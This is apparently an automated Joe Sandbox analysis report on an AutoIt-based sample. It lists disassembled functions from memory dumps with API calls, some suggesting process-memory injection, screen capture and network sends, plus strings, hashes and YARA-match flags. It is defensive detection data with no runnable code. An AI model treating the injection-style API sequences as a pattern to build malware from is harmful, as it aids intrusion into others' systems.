Opcode Fuzzy Hash: 7d27d8e721ad03dbe55ded66aae9ccf99809f31b7f353bdd756c2e84b6ba622f
Instruction Fuzzy Hash: 99512575500295CFDF25DF68C888AFA7BA4EF55310F280055FCA1AB2D0D734AE82CB64

Function 0179E4DD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0179E6A7,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0179E50C

Part of subcall function 0179E1A5: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0179E1C3

Strings

ggg, xrefs: 0179E5F1
eeee, xrefs: 0179E617
yyyy, xrefs: 0179E5FE

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 404f1a0192573a95862c181cca6008038e52368753a67e6b7e6ef358e5ff8838
Instruction ID: 0c7eedb65a57681e7c2dd05b2cfb97dadf98ca6b629ecc5e57d828b7f77afeea
Opcode Fuzzy Hash: 404f1a0192573a95862c181cca6008038e52368753a67e6b7e6ef358e5ff8838
Instruction Fuzzy Hash: 7341E3607082064BDF11EABCBC99ABEF7A6EFA4300F640075D841C3759FE25E90D87A1

Function 046FB958 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,046FBB22,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 046FB987

Part of subcall function 046FB620: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 046FB63E

Strings

eeee, xrefs: 046FBA92
ggg, xrefs: 046FBA6C
yyyy, xrefs: 046FBA79

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 75698b4038985cfcf5aa26e6764cbb40851b3da1b49805236c77fb13afb51d7f
Instruction ID: 8df79785a6e1b750620261c8fb0c539ec9c2e515da18bb524f6e65b9d79b8cef
Opcode Fuzzy Hash: 75698b4038985cfcf5aa26e6764cbb40851b3da1b49805236c77fb13afb51d7f
Instruction Fuzzy Hash: 9B4123317001454BE701AE69CC806BFB396DBA5A08F540469D7C1D7B08FE24FE028729

Function 00C9A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C99E4E,?,?,00000034,00000800,?,00000034), ref: 00CA1CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C9A3F7

Part of subcall function 00CA1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C99E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00CA1CB0

Part of subcall function 00CA1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00CA1C08
Part of subcall function 00CA1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C99E12,00000034,?,?,00001004,00000000,00000000), ref: 00CA1C18
Part of subcall function 00CA1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C99E12,00000034,?,?,00001004,00000000,00000000), ref: 00CA1C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9A4B1

Strings

@, xrefs: 00C9A4C9

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c9bf5e07343344157f7b0c29a61e5080c896557bc0ab53e9e7a0a170621d35dc
Instruction ID: cadb9434b0279897280e8fa1d37103f28d14d966725641d590a0b7a786964497
Opcode Fuzzy Hash: c9bf5e07343344157f7b0c29a61e5080c896557bc0ab53e9e7a0a170621d35dc
Instruction Fuzzy Hash: 4941697290121CAFCF10DBA4CD89BDEBBB8EB49304F144095FA55B7180DA706E85DBA1

Function 00CC81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CC826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CC827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CC8284

Strings

msctls_updown32, xrefs: 00CC81E9

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 7c0e0e3b9a124f897ee65347e582f120ebf022fb202e7cc599b3970851205464
Instruction ID: 4cd5adf7c6c424ce82a2c6a350aa34bfc31002328b2e674f4e3ec5825c728224
Opcode Fuzzy Hash: 7c0e0e3b9a124f897ee65347e582f120ebf022fb202e7cc599b3970851205464
Instruction Fuzzy Hash: 60217CB1A04209AFDB10DF58CC85E6B37EDEB4A394B484059FA159B391CB70EC15DBA0

Function 04741A4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000), ref: 04741A58
PrintWindow.USER32(00000000,00000000,00000000), ref: 04741B1B

Part of subcall function 047254F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020119), ref: 04725520
Part of subcall function 047254F8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000004,00000004,80000001,00000000,00000000,00020119), ref: 04725547
Part of subcall function 047254F8: RegCloseKey.ADVAPI32(00000000,80000001,00000000,00000000,00020119), ref: 0472555F

Strings

AppliedDPI, xrefs: 04741A84
Control Panel\Desktop\WindowMetrics, xrefs: 04741A89

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Window$CloseOpenPrintQueryRectValue
String ID: AppliedDPI$Control Panel\Desktop\WindowMetrics
API String ID: 4074139357-3919141887
Opcode ID: f54fec9efda88de15f179a47df758c297e01cd55848a19942eee8425b8634946
Instruction ID: d119c1e241b8fc9fd92b8cc0f18b6a8b036072aa177d822adf8944a993010e22
Opcode Fuzzy Hash: f54fec9efda88de15f179a47df758c297e01cd55848a19942eee8425b8634946
Instruction Fuzzy Hash: 6721FA347002409FD300EF29C848A5ABBA6FFD6315F5482A9E5458F7A4DBB5EC46CF91

Function 0470C7EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62networksleepCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000), ref: 0470C825
WSAGetLastError.WS2_32 ref: 0470C841
Sleep.KERNEL32(00000001), ref: 0470C860

Strings

3', xrefs: 0470C855

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ErrorLastSleepsend
String ID: 3'
API String ID: 4076785223-280543908
Opcode ID: b85a57e60fa0321cfb8a47d9d627679a451c6841e55ab339d631720ac090baee
Instruction ID: d6c0410921604a7cba46beb9353ede708a8fa9a8db84c75543c61861e77fd165
Opcode Fuzzy Hash: b85a57e60fa0321cfb8a47d9d627679a451c6841e55ab339d631720ac090baee
Instruction Fuzzy Hash: F111E87060A302DFE725DE69D98461AB7E0BB84764F14CB2DF0A8832D0D370E9459BA7

Function 0470C1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 047221B8: GetFileAttributesA.KERNEL32(00000000,?,?,?,?,0470AD04,00000000,0470B1B3,?,?,00000000,00000000), ref: 047221FA

CoTaskMemAlloc.COMBASE(00000208), ref: 0470C1F0
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,00000000,0470C237,?,00000208,00000000,0470C26C), ref: 0470C210
CoTaskMemFree.COMBASE(?), ref: 0470C231

Strings

USERPROFILE, xrefs: 0470C1D3

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Task$AllocAttributesFileFolderFreePathSpecial
String ID: USERPROFILE
API String ID: 3197149909-2419442777
Opcode ID: 22da839fee0861da8ed99280f4d8af24554ec377b7b43ba2f2b08095791b6f44
Instruction ID: aacd61856fafa0a6f3781097f7e73fd3cfb9d13a658de4e69e73c19baf8adaf3
Opcode Fuzzy Hash: 22da839fee0861da8ed99280f4d8af24554ec377b7b43ba2f2b08095791b6f44
Instruction Fuzzy Hash: 1C119075A04608FFEB05EFE4C94199EB7F5EB49704FA181A0E900A7790EA70BE00CA50

Function 00C54BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C54AF7,?), ref: 00C54BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C54BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00C54BC4
kernel32.dll, xrefs: 00C54BB3

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 686c2977791a12437d587d29a870b5d159b7917feca4c47266329fc75dd5d379
Instruction ID: 7f608d6f21d57bc5e63c6e86516dad99cda669e54e305921c9abfe3be2d771a0
Opcode Fuzzy Hash: 686c2977791a12437d587d29a870b5d159b7917feca4c47266329fc75dd5d379
Instruction Fuzzy Hash: D4D0C734400B138FD3208F38EC08B0E72E4AF00342F209DBAD8A2C2650EB70C8C0CA00

Function 0179F951 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0179FE62,00000000,0179FE75), ref: 0179F957
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0179F968

Strings

GetDiskFreeSpaceExA, xrefs: 0179F962
kernel32.dll, xrefs: 0179F952

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: bd7f3725eb790fa1a72799fdf39f1b3cdd382fcf27b96dcbc4449fa28787150b
Instruction ID: 385bc21148cd5971f59be9f0a0b170a2015247f0728ca9ba6923b63b191ca83b
Opcode Fuzzy Hash: bd7f3725eb790fa1a72799fdf39f1b3cdd382fcf27b96dcbc4449fa28787150b
Instruction Fuzzy Hash: D7D0C7E0641302BEFF215FFE7495B16EAD89754739F9454E9E100C9209DE70944C4F50

Function 046FD344 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,046FDCCD,00000000,046FDCE0), ref: 046FD34A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 046FD35B

Strings

kernel32.dll, xrefs: 046FD345
GetDiskFreeSpaceExA, xrefs: 046FD355

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 2bc6636449f2aae1da58a654c40305674cb8ac37d973cea2a28724bf68df6dd7
Instruction ID: ac1c81e7be9b4521c12bf91702bbd5142cb89220efd869eb529bfb5b9584572f
Opcode Fuzzy Hash: 2bc6636449f2aae1da58a654c40305674cb8ac37d973cea2a28724bf68df6dd7
Instruction Fuzzy Hash: 48D09EB66467459BF7006AE4DDC466F2654D757144F40542AD3C266211F77CB8014B10

Function 00CBE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00CBE7A7
CharLowerBuffW.USER32(?,?), ref: 00CBE7EA

Part of subcall function 00CBDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CBDEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CBE9EA
_memmove.LIBCMT ref: 00CBE9FD

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: fda18985a5b3a1500e826d9f6a6c780307da3b498d8d8e962adc18ec7d1074c7
Instruction ID: dc03538c0a091ba87e3628d61f3b87512a64a0e62b2c16530cce13c6155ae9a6
Opcode Fuzzy Hash: fda18985a5b3a1500e826d9f6a6c780307da3b498d8d8e962adc18ec7d1074c7
Instruction Fuzzy Hash: 0CC13D75A083019FC754DF28C480AAABBE4FF89714F14896DF8999B351D731EA46CF82

Function 00CB877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CB87AD
CoUninitialize.OLE32 ref: 00CB87B8

Part of subcall function 00CCDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00CB8A0E,?,00000000), ref: 00CCDF71

VariantInit.OLEAUT32(?), ref: 00CB87C3
VariantClear.OLEAUT32(?), ref: 00CB8A94

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 94cd5688ae91b37871b31c2c3409777a36520fadfef7a3f01d0abb70c7d7fc7e
Instruction ID: 1f8ebe17574c3628e29098aecb4b2300073e472faf4d7b749d22c5ce8576acd1
Opcode Fuzzy Hash: 94cd5688ae91b37871b31c2c3409777a36520fadfef7a3f01d0abb70c7d7fc7e
Instruction Fuzzy Hash: 8FA17A75604B019FCB14EF54C481B6AB7E9BF88314F14884DF996AB3A2CB30ED05DB92

Function 00C9814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CD3C4C,?), ref: 00C98308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CD3C4C,?), ref: 00C98320
CLSIDFromProgID.OLE32(?,?,00000000,00CD0988,000000FF,?,00000000,00000800,00000000,?,00CD3C4C,?), ref: 00C98345
_memcmp.LIBCMT ref: 00C98366

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 8d9702706b48b8b12ec3c291d194b225cd82e7cac51265cebc2c7abdeb271431
Instruction ID: bb0ebef9b296dc651966dc32a086549d00694475a4e3dc8b48f368b55c937903
Opcode Fuzzy Hash: 8d9702706b48b8b12ec3c291d194b225cd82e7cac51265cebc2c7abdeb271431
Instruction Fuzzy Hash: 77813A75A00109EFCF00DF94C888EEEB7B9FF89315F244599E515AB250DB71AE4ACB60

Function 00C6492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C649C0
__flush.LIBCMT ref: 00C649E0
__write.LIBCMT ref: 00C64A13
__flsbuf.LIBCMT ref: 00C64A41

Part of subcall function 00C68D58: __getptd_noexit.LIBCMT ref: 00C68D58

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 85f34f0fdd6a44f0ee11f63d7b38210f0fc79cc0102f2b0afbcbc3b175760ecc
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 1C41D575640706ABDF3CDEA9C8D096F7BA9AF40360B24823DE865C7641D7709E419B44

Function 00C9A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C9A68A
__itow.LIBCMT ref: 00C9A6BB

Part of subcall function 00C9A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C9A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C9A724
__itow.LIBCMT ref: 00C9A77B

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: ca73c61d2ef1eda1835b23e82ae173f6888adcb46c547dcff2cd5d21da536cac
Instruction ID: 898a000c718c797734207e94ddb6e4cfa7b9f5e5c7231983a223c176c2e9a701
Opcode Fuzzy Hash: ca73c61d2ef1eda1835b23e82ae173f6888adcb46c547dcff2cd5d21da536cac
Instruction Fuzzy Hash: 09418174A00208AFDF11EF54C84EBEE7BB9EF44751F040029FD15A3291DB719A88DAA6

Function 047010AC Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0470115B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04701177
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 047011EE
VariantClear.OLEAUT32(?), ref: 04701217

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction ID: 77d9d6c65b3791e1f0059145695949841bd88b657f87ba805693744c43d21d12
Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction Fuzzy Hash: 7041F775A022698FDB62EB58CC94BD9B3FCEB48314F4081D5E548E7382DA31AF808F54

Function 0179E711 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0179E72D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0179E751
GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 0179E76C
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0179E810

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 498414e7c70d65d362acd9faded3c19cebdae4ca124559b6720e5807612d686a
Instruction ID: 2a67c41225bbed37cb75d64710234570695d0deb0945287942dfaa9db46aa3a8
Opcode Fuzzy Hash: 498414e7c70d65d362acd9faded3c19cebdae4ca124559b6720e5807612d686a
Instruction Fuzzy Hash: 3F41D971A002599FDF21DBA8ED84BDDF7B9AB59300F0440E5E908E7245DB749F888F51

Function 046FBB8C Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 046FBBA8
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 046FBBCC
GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 046FBBE7
LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 046FBC8B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: fc313d46bdeb53d318a6fed8bb99b3f5323030cb881808b72ad5cbadf7265b56
Instruction ID: eac88f0d91eeb3dcc702c3ca1dc13bc86a03e043e50bbd34ed5c4ad9005a2836
Opcode Fuzzy Hash: fc313d46bdeb53d318a6fed8bb99b3f5323030cb881808b72ad5cbadf7265b56
Instruction Fuzzy Hash: 5041FCB0A0065C9FEB11DB68CC84BDEB7F9AB18604F1440EAE648E7250E774BF858F55

Function 0179E70F Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0179E72D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0179E751
GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 0179E76C
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0179E810

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 5fafd84639308ab77266720af46c3541de18f8ce6a42af81c7e0916bb37dc283
Instruction ID: c1ba3ad61314f9feb1c6dc6ba248426c6467d6c3671df2bdb251fc398e3f1273
Opcode Fuzzy Hash: 5fafd84639308ab77266720af46c3541de18f8ce6a42af81c7e0916bb37dc283
Instruction Fuzzy Hash: D041E770A002599FDF21DBA8ED84B9DF7F9AB59300F0440E5EA08EB245DB749F888F51

Function 046FBB8A Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 046FBBA8
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 046FBBCC
GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 046FBBE7
LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 046FBC8B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 7b1ffbc9193177b09f4b8ab236cdf4ce635a89473ee1d19d3812a9a3136253b5
Instruction ID: cb62f58b8d0c93118a8e13bbd6b78d6493dbd4c0981ce37046ba71232287a992
Opcode Fuzzy Hash: 7b1ffbc9193177b09f4b8ab236cdf4ce635a89473ee1d19d3812a9a3136253b5
Instruction Fuzzy Hash: 8F411C70A0025C9FEB11DB68CC84BDEB7F8AB18604F0440EAA648E7250E774BF858F59

